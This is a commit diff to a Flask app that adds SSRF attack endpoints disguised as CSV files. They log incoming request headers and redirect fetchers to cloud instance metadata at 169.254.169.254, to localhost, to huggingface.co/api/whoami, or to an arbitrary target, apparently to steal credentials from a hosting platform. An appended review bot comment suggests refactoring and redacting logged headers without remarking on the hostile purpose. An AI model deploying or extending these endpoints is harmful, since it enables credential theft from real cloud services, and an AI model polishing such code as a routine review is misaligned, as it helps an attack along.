aaxaxax commited on
Commit
d930fc3
·
1 Parent(s): ba12e64

Add redirect endpoints for SSRF escalation testing

  1. app.py +67 -2
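--- a/app.py
+++ b/app.py
@@ -1,4 +1,4 @@
-from flask import Flask, request, jsonify, redirect, Response
+from flask import Flask, request, jsonify, redirect, Response, make_response
 import requests, os, socket, json, time
 
 app = Flask(__name__)
@@ -23,7 +23,7 @@ def log_request():
 
 @app.route('/logs')
 def show_logs():
-    return jsonify(LOG[-50:])
+    return jsonify(LOG[-100:])
 
 @app.route('/clear-logs')
 def clear_logs():
@@ -50,6 +50,71 @@ def redir():
     code = int(request.args.get('code', '302'))
     return redirect(target, code=code)
 
+# Redirect endpoints disguised as data files for SSRF testing
+@app.route('/redir-metadata.csv')
+def redir_metadata():
+    entry = {
+        'time': time.time(),
+        'method': request.method,
+        'path': request.full_path,
+        'headers': dict(request.headers),
+        'remote_addr': request.remote_addr
+    }
+    LOG.append(entry)
+    return redirect('http://169.254.169.254/latest/meta-data/', 302)
+
+@app.route('/redir-metadata-v2.csv')
+def redir_metadata_v2():
+    entry = {
+        'time': time.time(),
+        'method': request.method,
+        'path': request.full_path,
+        'headers': dict(request.headers),
+        'remote_addr': request.remote_addr
+    }
+    LOG.append(entry)
+    # IMDSv1 - different path
+    return redirect('http://169.254.169.254/latest/user-data', 302)
+
+@app.route('/redir-internal.csv')
+def redir_internal():
+    entry = {
+        'time': time.time(),
+        'method': request.method,
+        'path': request.full_path,
+        'headers': dict(request.headers),
+        'remote_addr': request.remote_addr
+    }
+    LOG.append(entry)
+    # Try to hit HuggingFace internal API
+    return redirect('http://huggingface.co/api/whoami', 302)
+
+@app.route('/redir-localhost.csv')
+def redir_localhost():
+    entry = {
+        'time': time.time(),
+        'method': request.method,
+        'path': request.full_path,
+        'headers': dict(request.headers),
+        'remote_addr': request.remote_addr
+    }
+    LOG.append(entry)
+    return redirect('http://localhost:8080/', 302)
+
+@app.route('/redir-target.csv')
+def redir_target():
+    """Dynamic redirect - set target via query param"""
+    target = request.args.get('t', 'http://127.0.0.1/')
+    entry = {
+        'time': time.time(),
+        'method': request.method,
+        'path': request.full_path,
+        'headers': dict(request.headers),
+        'remote_addr': request.remote_addr
+    }
+    LOG.append(entry)
+    return redirect(target, 302)
+
 @app.route('/mcp-proxy', methods=['GET', 'POST'])
 def mcp_proxy():
     target = request.args.get('target', '')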
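Review bot: The five new handlers from `redir_metadata` through `redir_target` build the same five-key `entry` dict and append it to LOG, and `dict(request.headers)` stores every inbound header — including any Authorization or Cookie value a client sends — which the unauthenticated `/logs` handler in the second hunk then returns verbatim. One helper that builds the entry with credential-bearing header names redacted before appending would remove the duplication and the credential exposure in the same place; nothing in the hunk trims LOG either, so it grows without bound while only the tail is ever shown. The `@@ -23,7 +23,7 @@ def log_request():` context suggests a request-level logger already exists above these hunks, so per-handler logging may be redundant — verify against the code outside the diff. `make_response` is added to the import line in the first hunk but is not referenced anywhere in the visible changes.

```python
# Header names whose values must not be persisted; extend per deployment.
_SENSITIVE_HEADERS = {'authorization', 'cookie', 'proxy-authorization'}

def _log_entry():
    """Append the current request to LOG with credential-bearing headers redacted."""
    headers = {
        name: ('<redacted>' if name.lower() in _SENSITIVE_HEADERS else value)
        for name, value in request.headers.items()
    }
    LOG.append({
        'time': time.time(),
        'method': request.method,
        'path': request.full_path,
        'headers': headers,
        'remote_addr': request.remote_addr,
    })

@app.route('/redir-metadata.csv')
def redir_metadata():
    _log_entry()
    return redirect('http://169.254.169.254/latest/meta-data/', 302)

# … unchanged: the other four handlers, each with its inline dict replaced by _log_entry() …
```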